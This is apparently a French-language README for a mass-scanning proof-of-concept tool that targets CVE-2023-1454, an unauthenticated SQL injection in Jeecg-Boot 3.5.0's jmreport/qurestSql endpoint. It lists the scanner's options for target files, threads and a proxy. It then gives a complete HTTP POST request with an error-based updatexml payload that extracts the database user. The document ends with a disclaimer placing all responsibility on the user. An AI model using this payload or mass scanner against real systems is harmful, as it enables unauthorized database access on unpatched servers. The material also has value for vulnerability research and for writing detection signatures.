
jmreport/qurestSql POC de scan en masse d'injection SQL non autorisée. Jeecg-Boot est une plateforme de développement rapide basée sur Spring Boot et Jeecg-Boot-Plus. La dernière version jeecg-boot 3.5.0 a été signalée comme présentant plusieurs vulnérabilités d'injection SQL.
jmreport/qurestSql Injection SQL non authentifiée - POC de scan massif. Jeecg-Boot est une plateforme de développement rapide basée sur Spring Boot et Jeecg-Boot-Plus. La dernière version jeecg-boot 3.5.0 a révélé plusieurs vulnérabilités d'injection SQL.
usage: CVE-2023-1454.py [-h] [-u URL] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT] [-p PROXY]
optional arguments:
-h, --help Affiche ce message d'aide et quitte
-u URL, --url URL URL cible (ex. url.txt)
-f FILE, --file FILE Fichier cible (ex. url.txt)
-t THREAD, --thread THREAD
Nombre de threads (par défaut 5)
-T TIMEOUT, --timeout TIMEOUT
Délai d'attente de la requête (par défaut 3)
-o OUTPUT, --output OUTPUT
Fichier de sortie des URL vulnérables (ex. result.txt)
-p PROXY, --proxy PROXY
Proxy de requête (ex. http://127.0.0.1:8080)

POC :
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Content-Length: 128
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

Toute conséquence ou perte directe ou indirecte résultant de la diffusion ou de l'utilisation des informations fournies dans ce document est de la seule responsabilité de l'utilisateur ; l'auteur n'en assume aucune responsabilité.